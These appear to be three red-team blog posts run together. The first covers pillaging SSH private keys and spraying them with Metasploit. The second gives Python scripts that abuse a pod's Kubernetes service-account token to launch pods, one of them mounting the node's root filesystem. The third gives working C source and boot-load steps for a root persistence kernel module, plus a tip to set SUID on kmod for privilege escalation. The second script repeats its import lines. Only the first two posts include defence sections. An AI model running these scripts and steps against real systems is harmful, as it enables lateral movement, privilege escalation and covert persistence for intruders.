Leveraging Pillaged SSH keys

TLDR; These days when you run into a production Linux or cloud environments, they use public key authentication. Making lateral movement as easy as leveraging pillaged SSH keys.

Level Settings

SSH (Secure Shell) is the primary means of managing Cloud Instances, Linux, Unix, OSX, Networking Devices, Vendor Devices, and even some embedded devices. It’s also worth noting that Microsoft has received glowing reviews and support for its roll out of SSH into current builds, but it is not enabled by default. Generally speaking SSH uses the servers local user base and corresponding passwords to authenticate remote connections. However, SSH can also be configured to use Public Key authentication.

How SSH Public Key Authentication Works

Since SSH is designed to use a RSA or DSA Public (Encryption) key and Private (Decryption) key combinations to encrypt traffic. A user can add a Public key to their authorized keys file, to allow the use of the corresponding Private key for authentication. This allows the user to attempt to establish a secure connection by sending their username and the fingerprint of the Public key to the SSH Server. If a Public key with the given fingerprint is within the requested users authorized keys file, then the SSH server responds with an encrypted challenge. This challenge is encrypted with the users Public key and can only be decrypted with the corresponding Private key. If the challenge is successfully answered with an encrypted respond using the SSH Servers Public key, the client and server are successfully authenticated.

What is the Inherit Problem

These days when you run into a production Linux or Cloud environment, more than likely SSH services are going to use Public Key authentication. The traditional rapid guessing won’t work if only public key authentication is enabled. If a Public key fingerprint is not submitted, then the SSH server will simply terminate the session. So in order to pivot into a high value environment all that’s needed is to locate and begin leveraging pillaged SSH private keys with the proper usernames to gain further access.

How to Pillage SSH Keys

The good news is Private keys are fairly easy to locate on users workstations and development servers. They almost always reside within the default SSH directories.

  • Linux = /home/<user>/.ssh/
  • OSX = /Users/<user>/.ssh/
  • Windows = C:\Users\<user>\.ssh\

As such they can be seamlessly picked up by an SSH client. It’s also worth digging through the home directories of Admin, Developer, and Operation users for .ppk, .key, rsa_id, dsa_id, .p12, .pem, and .pfx files, as they may be private keys.

Using Publicly Disclosed Keys

The even better news is many of the Major product vendors (F5, Cisco, Barracuda, and VMware to name a few) have been getting outted for distributing systems with static Private keys. This means if an admin doesn’t log in, remove the old keys, and manually regenerate new ones, then a shell can be established using publicly disclosed private keys.

Some good repositories to look for bad keys.

https://github.com/rapid7/ssh-badkeys

https://github.com/BenBE/kompromat

The good news is Metasploit has several modules that will make scanning discovered SSH services fairly easy. So all we need to do is feed it the proper data, run, and watch the shells rain in. Metasploit makes preforming private key authentication easy and seamless. All you need to do is give it a list of services, a username, and a private key. If authentication is successful it will even seamlessly establish a shell session for you.

Leveraging Pillaged SSH Keys

First we need a private key file, either one we’ve located from pillaging or a publicly known bad key. For example the publicly disclosed Vagrant (Vagrant preforms cross platform Virtual Machine management) Private key.

The corresponding Public key looks like the following:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA6NF8iallvQVp22WDkTkyrtvp9eWW6A8YVr+kz4TjGYe7gHzIw+niNltGEFHzD8+v1I2YJ6oXevct1YeS0o9HZyN1Q9qgCgzUFtdOKLv6IedplqoPkcmF0aYet2PkEDo3MlTBckFXPITAMzF8dJSIFo9D8HfdOV0IAdx4O7PtixWKn5y2hMNG0zQPyUecp4pzC6kivAIhyfHilFR61RGL+GPXQ2MWZWFYbAGjyiYJnAmCP3NOTd0jMZEnDkbUvxhMmBYSdETk1rRgm+R4LOzFUGaHqHDLKLX+FIPKcF96hrucXzcWyLbIbEgE98OHlnVYCzRdK8jlqm8tehUc9c9WhQ== vagrant insecure public key

The second thing needed is the username of the user who has the public key in their authorized key file. As stated in the note, this can normally be found in the public key note. In the case of the vagrant key, the username is also widely known to be vagrant.

With a Private key and Username combination, the auxiliary/scanner/ssh/ssh_login_pubkey module can be used to scan for systems that the private key works on. A session will be established when authentication is successful. When a session is established Metasploit will also collect basic system information for you, including hostname, kernel version, and group memberships.

Finding the Username for Pillaged SSH Keys

Public keys listed within a user authorized_keys file can have comments after the actual key data. Most SSH key generates take advantage of this comment field, to add the username and hostname when a key is generated.

It’s also worth noting that most SSH clients keep a known hosts file, for integrity purposes, which can be viewed to see which systems the key was used to access recently.

If you find just a Private key file during pillaging, the public key data can be derived form it in most cases. However the username likely won’t be associated with it. When no username is found, a common username file can be passed alongside the key in Metasploit.

Speeding Scans up with sshscan

The Metasploit SSH modules are not threaded safe and running more than one connection at a time could cause a thread to hang or exhaustion of system resources. SSH generally is not considered thread safe, because responses after the authentication process are not formally structured. However there is a SSH scanner written using the native go SSH client, which works very well. Just take care to ensure the command you run, provides a simple, small, and structured output (like id). https://github.com/CroweCybersecurity/go-sshscan

SSH Defense Strategies

  1. When generating a Public and Private key pair, a passphrase can be provided to protect the keys. When a passphrase is setup, the SSH client must prompt for the passphrase every time the private key is used. Thus if a key with a passphrase is discover by am attacker its normally not usable.
  2. Implementing an enterprise key management solution to ensure all systems have their own private keys. This would simply crush the reuse factor and stop lateral movement.
  3. Configuring the SSH Server to require both the public key and the users password for authentication. This will slow scanners to a crawl, as the password prompt would cause the session to hang, once the key authentication has completed.
  4. Have a single Private key for all hosts that provides access to a lowest privilege user. Once a connection is established legitimate users can switch to their respective user accounts. If a key was discovered during an assessment we would have to dig through all the systems hoping for a major system misconfiguration. Hopefully, a needle in a haystack.
  5. Avoid key management all together, by utilizing Certificate Authority (CA) backed system to automatically generate sign key pairs for authorized users. The biggest tech companies already do this and some have even blogged about it in the past.

Other SSH Blog Posts

Abuse Kubernetes with the Automount Service Account Token

While I was recently practicing to take my Certified Kuberenetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option, automatically mounts the service account token, within each container of a given pod. This account token is meant to provide the pod the ability to interact with the Kubernetes API server. This option being enabled by default, creates a great way for attackers with access to a single container, to abuse Kubernetes with the Automount Service Account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its specifications. This is because the service account dictates permissions and is used to run a pods processes. By default, if a service account isn’t provided during the creation of the pod, then the “default” service account for the pods namespace is added automatically. Without a different service account being automatically created within each namespace and added to each pod spec, there wouldn’t be any real resource/process separation happening between different namespaces.

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure the service account called “default” exists with a valid API Bearer token. When a pod is created within the new namespace, the admission controller then checks the pod spec for a valid service account and adds the “default” service account if one doesn’t exist. If the “automountServiceAccountToken” option isn’t explicitly set to false within either the pod spec or service account spec, then the admission controller will also add a volume mount for the service account token, to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly to “/var/run/secrets/kubernetes.io/serviceaccount” within every running container by default.

Why is the Automount Service Account Token bad?

Since the permissions are assigned to a service account and all pod processes are run as the service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide better access to the Kubernetes API server, there wasn’t much need to disable it by default. Additionally, some popular tooling have utilized the service account token to communicate with Kubernetes and as such it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script or even curl commands we can abuse Kubernetes with the automount service account token.

How to Abuse Automount Service Account Token

I could probably write a whole post around the topic of interacting with the Kubernetes API, but lucky almost all major programing languages already have Kubernetes client libraries. In my case, I often write in python and the python client library can handle loading a containers service account token. With that token we can utilize simple function calls like within the following example to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'busybox'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c", 
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ]
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

time.sleep(10)
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

Using service account token to escalate privilege with node root volume

Since by default there are not any pod security polices to restrict the ability to mount a nodes local root filesystem. We can try to leverage the service account token within a compromised container to create a new pod with a volume which mounts the nodes root filesystem with a similar script.

from kubernetes import client, config
import time

config.load_incluster_config()
from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'support'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c",
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ],
					'volumeMounts': [{
                        'name': 'host',
                        'mountPath': '/host'
                    }]
                }],
                'volumes': [{
                    'name': 'host',
                    'hostPath': {
                        'path': '/',
                        'type': 'Directory'
                    }
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom comand")
v1.create_namespaced_pod(namespace=current_namespace,body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

You can also use the node selector and label like “kubernetes.io/hostname” to try and get the new pod to spin up on a higher value control plane node.

With access to a pod container with the nodes root filesystem mounted, normal file and credential pillaging can take place. Also easier persistence methods can be used with write access, like adding a crontab or my recent post on leveraging controlled failure of systemd services, to gain a foot hold on the Kubernetes control plane.

How to Fix Automount Service Account Token Issues?

Based on the official issue #57601, opened in late 2017. This issue is unlikely to be addressed until API v2 is available, because it’s currently required for backwards compatibility. That being said, this issue can still be addresses manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an Initializer to inject a custom service account upon pod creation. The only other option would be to patch a change to the admission controller, but that would risk issues with compatibility and break future upgrades.

Establish Persistence with a Custom Kernel Module

First and foremost I have to admit that establishing persistence with a custom kernel module, isn’t the most ideal way. Creating kernel modules isn’t that easy. Kernel modules are normally compiled against a single kernel version, there are significant limitations on what can be done in kernel space, and errors can cause the system to freeze or crash. Regardless, I think its a valuable learning experience, that all Linux security professionals should understand. For a much easier way to maintain access to modern system check out my post on persistence with systemd timers.

As mentioned, kernel space capabilities are limited to dealing with files and devices on behalf of userspace applications. Since modules themselves are loaded into the running kernel it can be fairly difficult to write persistence code within a module that plays nice with the kernel space protections and limited functionality. Instead we can leverage a kernel function “call_usermodehelper” to execute a command in the requesting userspace. Since by default only the root user can request a module be loaded, this gives us command execution as root. In its most simplistic form the source code for a module, test_shell.c would look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    call_usermodehelper("/tmp/exe", NULL, NULL, UMH_WAIT_EXEC);
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Since kernel mode capabilities and libraries are so limited, we can further simplify the payload execution by staging it into a standard c application instead. This allows for the module to attempt to execute the staged application in a root terminal and still return normally regardless of what happens. The source code for a simple c execution program, nammed exe.c, might look like the following.

#include <stdlib.h>
int main(void)
{
    system("wall \"Hello There Im a Module!\"");
    return 0;
}

If we don’t want to stage a second executable to establish persistence with the custom kernel module, its possible to create variables for the users environment and command line arguments to be passed directly to the ‘call_usermodeheler’ function. The module source code to do this might look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros


MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{

    static char *envp[] = {
    "HOME=/",
    "TERM=linux",
    "USER=root",
    "SHELL=/bin/bash",
    "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
    NULL};

    char *argv[] = {
    "wall",
    "\"Hello I'm a Module!\"",
    NULL};

    call_usermodehelper("/bin/bash", argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "Installing Module!\n");
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Before compiling the module, you will need to be on the target system or a similar system with the same kernel version. You will also need to have all of the required tools for kernel development and the current kernels header files. The easiest way to do that is to run ‘apt-get install build-essential linux-headers-$(uname -r)’ on Debian based systems or ‘yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make’ for Redhat based systems.

Once the build tools are installed, we can create a Makefile with a kbuild (kernel builder) extension at the top to compile our module. Just keep in might that kbuild will switch to the kernel source directory and only allow use of includes of headers within the original source.

obj-m += test_shell.o

all:
         make -C /lib/modules/$(shell uname -r)/build M=${PWD} modules

clean:
        make -C /lib/modules/$(shell uname -r)/build M=${PWD} clean

You can use a command like ‘insmod test_shell.ko’ to load a module directly into the kernel and ‘rmmod test_shell.ko’ to remove the module. This allows for easy testing of modules, before configuring them to automatically loaded at boot.

Once the module is complied and tests successfully, we can copy the module to the current kernels’ modules directory.

cp test_shell.ko /lib/modules/`uname -r`/kernel/lib/

Next we need to run ‘depmod’ to build out the binary tree files of all the modules and dependencies. Without the dependency tree updated, the system wont know our module exists or how to load it into the kernel.

depmod -a 

If we are going to stage the second executable for the module to attempt to execute, then we will need to compile it with gcc like the following.

gcc exe.c -o /tmp/exe

To have persistence with the custom kernel module loaded at boot time, we need to modify the config files for either modprobe or kmod depending on which is used. In most cases you can easily figure out if its a kmod system by looking if the standard module tools are just symbolic links to kmod. This can be done with a command like the following.

ls -al `which modprobe`

If the you do see modprobe is just a symbolic link to kmod, getting a registered module to start at boot is fairly simple. Just place the name of the module, minus the .ko extension, in the /etc/module config file. This can be done with a simple command like the following. It will cause systemd-modules-load service to utlize kmod, to automatically load the module on boot.

echo 'test-shell' >> /etc/modules

Interesting you can actually set the SUID bit on kmod so standard users can load modules as root. Whereas if you set SUID on legacy modprobe executable, it still runs in the userspace instead. So simply setting SUID on the kmod executable can be an easy way to establish privilege escalation similar to the dash shell, I’ve blogged about before.

If its not a kmod system, we can instead utilize modprobe to automatically start the custom module by creating a .conf file in the /etc/modeprobe.d/ directory. The content of the .conf should look similar too:

install test_shell

On modprobe systems, standard users can also request a module be loaded, if there is a valid configuration file that already exists. But any code execution is done within the requesting users context. Interestingly enough you can have modprobe run a terminal command after loading a module by appending a command to the end of install statement in the config file. That could work as a persistence method as well, but there is no guarantee all filesystems are mounted and networking has been established when the module is loaded.

With all that work complete, we have established persistence, until the kernel is updated at least.